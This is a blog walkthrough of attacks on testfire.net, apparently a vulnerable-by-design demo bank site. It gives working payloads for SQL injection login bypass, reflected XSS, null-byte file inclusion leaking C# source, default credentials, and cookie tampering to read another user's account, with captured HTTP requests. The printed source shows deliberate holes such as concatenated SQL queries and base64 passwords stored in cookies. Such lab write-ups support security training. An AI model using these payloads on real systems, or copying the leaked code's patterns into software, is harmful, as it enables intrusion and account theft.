首页 » Network_security » Penetration » 正文

How to hack www.testfire.net

AltoroMutual is an vulnerable-by-design web application created by WatchFire,now let us hack it.

www.testfire.net:

1.Weak password :

www.testfire.net/bank/login.aspx

admin admin

 

2.SQL injection(word type)

www.testfire.net/bank/login.aspx

username: ‘ or ‘1’=’1

password:’ or ‘1’=’1

 

3.Reflection xss

www.testfire.net/search.aspx?txtSearch=<script>alert(%2Fxss%2F)<%2Fscript>

<script>alert(/xss/)</script>

 

4.File inclusion:

www.testfire.net/default.aspx?content=1xxxxx.txt

that cause absolute path leak:‘C:\downloads\AltoroMutual_v6\website\static\1xxxxx.txt’. 

 

5.Directory traverse

www.testfire.net/bank/

 

6.Source code leak

Using file inclusion and directory traverse,then use %00 to bypass txt and htm.

http://www.testfire.net/default.aspx?content=../bank/login.aspx.cs%00.txt

using System;using System.Data;using System.Data.SqlClient;using System.Data.OleDb;using System.Text.RegularExpressions;using System.Web;using System.Web.UI;using System.Web.UI.WebControls;using System.Web.UI.HtmlControls;using System.Configuration;namespace Altoro{ public partial class Authentication : Page { protected void Page_Load(object sender, System.EventArgs e) { // Put user code to initialize the page here Response.Cache.SetCacheability(HttpCacheability.NoCache); HtmlMeta meta = new HtmlMeta(); HtmlHead head = (HtmlHead)Page.Header; meta.Name = "keywords"; meta.Content = "Altoro Mutual Login, login, authenticate"; head.Controls.Add(meta); if(Request.Params["passw"] != null) { String uname = Request.Params["uid"]; String passwd = Request.Params["passw"]; String msg = ValidateUser(uname, passwd); if (msg == "Success") { Response.Redirect("main.aspx"); } else { message.Text = "Login Failed: " + msg; } } } protected string ValidateUser(String uName, String pWord) { //Set default status to Success string status = "Success"; OleDbConnection myConnection = new OleDbConnection(); myConnection.ConnectionString = ConfigurationManager.ConnectionStrings["DBConnStr"].ConnectionString; myConnection.Open(); string query2 = "SELECT * From users WHERE username = '" + uName + "'"; string query1 = query2 + " AND password = '" + pWord + "'"; if (ConfigurationManager.ConnectionStrings["DBConnStr"].ConnectionString.Contains("Microsoft.Jet.OLEDB.4.0")) { // Hack for MS Access which can not terminate a string query1 = Regex.Replace(query1, "--.*", ""); query2 = Regex.Replace(query2, "--.*", ""); } DataSet ds = new DataSet(); OleDbDataAdapter myLogin = new OleDbDataAdapter(query1, myConnection); myLogin.Fill(ds, "user"); if (ds.Tables["user"].Rows.Count==0) { OleDbDataAdapter myFailed = new OleDbDataAdapter(query2, myConnection); myFailed.Fill(ds, "user"); if (ds.Tables["user"].Rows.Count==0) { status = "We're sorry, but this username was not found in our system. Please try again."; } else { status = "Your password appears to be invalid. Please re-enter your password carefully."; } } else { //Get the row returned by the query DataRow myRow = ds.Tables["user"].Rows[0]; //Set the Session variables. Session["userId"] = myRow["userid"]; Session["userName"] = myRow["username"]; Session["firstName"] = myRow["first_name"]; Session["lastName"] = myRow["last_name"]; Session["authenticated"] = true; //Close the database collection. myConnection.Close(); //Set UserInfo cookie DateTime dtNow = DateTime.Now; TimeSpan tsHour = new TimeSpan(0, 0, 180, 0); string sCookieUser = new Base64Decoder(uName).GetDecoded(); HttpCookie UserInfo = Request.Cookies["amUserInfo"]; if ((UserInfo == null) || (sCookieUser != Session["userName"].ToString())) { UserInfo = new HttpCookie("amUserInfo"); UserInfo["UserName"] = new Base64Encoder(uName).GetEncoded(); UserInfo["Password"] = new Base64Encoder(pWord).GetEncoded(); UserInfo.Expires = dtNow.Add(tsHour); Response.Cookies.Add(UserInfo); } HttpCookie UserId = Request.Cookies["amUserId"]; UserId = new HttpCookie("amUserId"); UserId.Value = Session["userId"].ToString(); Response.Cookies.Add(UserId); query1 = "SELECT userid, approved, card_type,interest, limit FROM promo WHERE userid=" + Session["userId"]; OleDbDataAdapter myApproval = new OleDbDataAdapter(query1, myConnection); myApproval.Fill(ds, "promo"); DataTable myTable = ds.Tables["promo"]; DataRow curRow = myTable.Rows[0]; if (System.Convert.ToBoolean(curRow["approved"])) { HttpCookie CreditOffer = Request.Cookies["amCreditOffer"]; CreditOffer = new HttpCookie("amCreditOffer"); CreditOffer["CardType"] = curRow["card_type"].ToString(); CreditOffer["Limit"] = curRow["limit"].ToString(); CreditOffer["Interest"] = curRow["interest"].ToString(); Response.Cookies.Add(CreditOffer); } } myConnection.Close(); return status; } protected string GetUserName() { HttpCookie UserInfo = Request.Cookies["amUserInfo"]; if (Request.Params["uid"] != null) { return Request.Params["uid"].ToString(); } if (UserInfo != null) { return new Base64Decoder(UserInfo["UserName"]).GetDecoded(); } else { return ""; } } #region Web Form Designer generated code override protected void OnInit(EventArgs e) { // // CODEGEN: This call is required by the ASP.NET Web Form Designer. // InitializeComponent(); base.OnInit(e); } /// /// Required method for Designer support - do not modify /// the contents of this method with the code editor. /// private void InitializeComponent() { } #endregion }}

 

Main.aspx.cs:

using System;using System.Collections;using System.ComponentModel;using System.Data;using System.Data.OleDb;using System.Web;using System.Web.SessionState;using System.Web.UI;using System.Web.UI.WebControls;using System.Web.UI.HtmlControls;using System.Configuration;namespace Altoro{ /// /// Summary description for welcome. /// public partial class Default : Page { protected void Page_Load(object sender, System.EventArgs e) { Response.Cache.SetCacheability(HttpCacheability.NoCache); if (!(System.Convert.ToBoolean(Session["authenticated"]))) { Server.Transfer("logout.aspx"); } string thisUser = Request.Cookies["amUserId"].Value; DataRow myRow; DataTable acctTable = GetAccounts(thisUser); CheckPromo(thisUser); for (int i = 0; i < acctTable.Rows.Count; i++) { myRow = acctTable.Rows[i]; ArrayList myList = new ArrayList(); myList.Add(myRow["accountid"].ToString()); myList.Add(myRow["accountid"].ToString() + " " + myRow["acct_type"].ToString()); listAccounts.myItems.Add(myList); } } private DataTable GetAccounts(string userId) { OleDbConnection myConnection = new OleDbConnection(); myConnection.ConnectionString = ConfigurationManager.ConnectionStrings["DBConnStr"].ConnectionString; myConnection.Open(); string query = "SELECT accountid, acct_type From accounts WHERE userid = " + userId; OleDbDataAdapter myAccounts = new OleDbDataAdapter(query, myConnection); DataSet ds = new DataSet(); myAccounts.Fill(ds, "accounts"); DataTable myTable = ds.Tables["accounts"]; myConnection.Close(); return myTable; } private void WritePromo(string cType, string cLimit, string cInterest) { string promoText = ""; promoText += ""; promoText += ""; promoText += ""; promo.Visible = true; promo.Text = promoText; } private void CheckPromo(string strUserId) { if (Request.Cookies["amCreditOffer"] != null) { HttpCookie CreditOffer = Request.Cookies["amCreditOffer"]; WritePromo(CreditOffer["CardType"], CreditOffer["Limit"], CreditOffer["Interest"]); } } protected String GetSessionValue(String key) { if (Request.Cookies["amUserId"].Value==Session["userId"].ToString()) { return Session[key].ToString(); } else { return ""; } } #region Web Form Designer generated code override protected void OnInit(EventArgs e) { // // CODEGEN: This call is required by the ASP.NET Web Form Designer. // InitializeComponent(); base.OnInit(e); } /// /// Required method for Designer support - do not modify /// the contents of this method with the code editor. /// private void InitializeComponent() { } #endregion }}

 

7.Brute force

www.testfire.net/bank/login.aspx

admin admin

 

8.Username and password leak

Login and catch packet:

===================================

POST /bank/login.aspx HTTP/1.1

Host: www.testfire.net

User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:53.0) Gecko/20100101 Firefox/53.0

Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8

Accept-Language: en-US,en;q=0.5

Accept-Encoding: gzip, deflate

Content-Type: application/x-www-form-urlencoded

Content-Length: 71

Referer: http://www.testfire.net/bank/login.aspx

Cookie: ASP.NET_SessionId=tfhy1p55tny5x1uzkt1n5355; amSessionId=3323331870; amUserInfo=UserName=MScgb3IgJzEnPScx&Password=MScgb3IgJzEnPScx

Connection: close

Upgrade-Insecure-Requests: 1

 

uid=1%27+or+%271%27%3D%271&passw=1%27+or+%271%27%3D%271&btnSubmit=Login

======================================================

Login success then get main.aspx

=======================================================

GET /bank/main.aspx HTTP/1.1

Host: www.testfire.net

User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:53.0) Gecko/20100101 Firefox/53.0

Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8

Accept-Language: en-US,en;q=0.5

Accept-Encoding: gzip, deflate

Referer: http://www.testfire.net/bank/login.aspx

Cookie: ASP.NET_SessionId=tfhy1p55tny5x1uzkt1n5355; amSessionId=3323331870; amUserInfo=UserName=MScgb3IgJzEnPScx&Password=MScgb3IgJzEnPScx; amUserId=1

Connection: close

Upgrade-Insecure-Requests: 1

=================================================================

The cookie include username and password ,they encode by base64,attacker may catch your packet or xss to get your cookie.

 

9.Unauthorized then get others information

100116014 jsmith

See jsmith’s information first.

Balance Detail

 

Amount 
Ending balance as of 5/21/2017 3:22:28 AM -800
Available balance -800

 

Credits

Account Date  Description Amount

 

1001160140 12/29/2004 Paycheck 1200
1001160140 05/14/2015 Balance Deposit 12

 

Debits

Account Date  Description Amount

 

1001160140 05/31/2015 Balance Withdrawal 1000
1001160140 05/31/2015 Balance Withdrawal 1000
1001160140 05/14/2015 Balance Withdrawal 12

 

 

100116015 cclay

Now the attacker cclay login her own account.

Catch packet:

=================================================

GET /bank/main.aspx HTTP/1.1

Host: www.testfire.net

User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:53.0) Gecko/20100101 Firefox/53.0

Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8

Accept-Language: en-US,en;q=0.5

Accept-Encoding: gzip, deflate

Referer: http://www.testfire.net/bank/login.aspx

Cookie: ASP.NET_SessionId=tfhy1p55tny5x1uzkt1n5355; amSessionId=3323331870; amUserInfo=UserName=Y2NsYXk=&Password=YWxp; amUserId=100116015; amCreditOffer=CardType=Gold&Limit=15000&Interest=2.4

Connection: close

Upgrade-Insecure-Requests: 1

Cache-Control: max-age=0

==========================================================

amUserId=100116015

modified to 100116014

 

Now the record is jsmith,then select a record and GO.

Catch packet:

=========================================================

POST /bank/account.aspx HTTP/1.1

Host: www.testfire.net

User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:53.0) Gecko/20100101 Firefox/53.0

Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8

Accept-Language: en-US,en;q=0.5

Accept-Encoding: gzip, deflate

Content-Type: application/x-www-form-urlencoded

Content-Length: 23

Referer: http://www.testfire.net/bank/main.aspx

Cookie: ASP.NET_SessionId=tfhy1p55tny5x1uzkt1n5355; amSessionId=3323331870; amUserInfo=UserName=Y2NsYXk=&Password=YWxp; amUserId=100116015; amCreditOffer=CardType=Gold&Limit=15000&Interest=2.4

Connection: close

Upgrade-Insecure-Requests: 1

 

listAccounts=1001160140

=======================================================

Modified amUserId=100116014 again then send.

Balance Detail

 

Amount 
Ending balance as of 5/21/2017 3:27:42 AM -800
Available balance -800

 

Credits

Account Date  Description Amount

 

1001160140 12/29/2004 Paycheck 1200
1001160140 05/14/2015 Balance Deposit 12

 

Debits

Account Date  Description Amount

 

1001160140 05/31/2015 Balance Withdrawal 1000
1001160140 05/31/2015 Balance Withdrawal 1000
1001160140 05/14/2015 Balance Withdrawal 12

 

Get jsmith’s information success!

 

Comment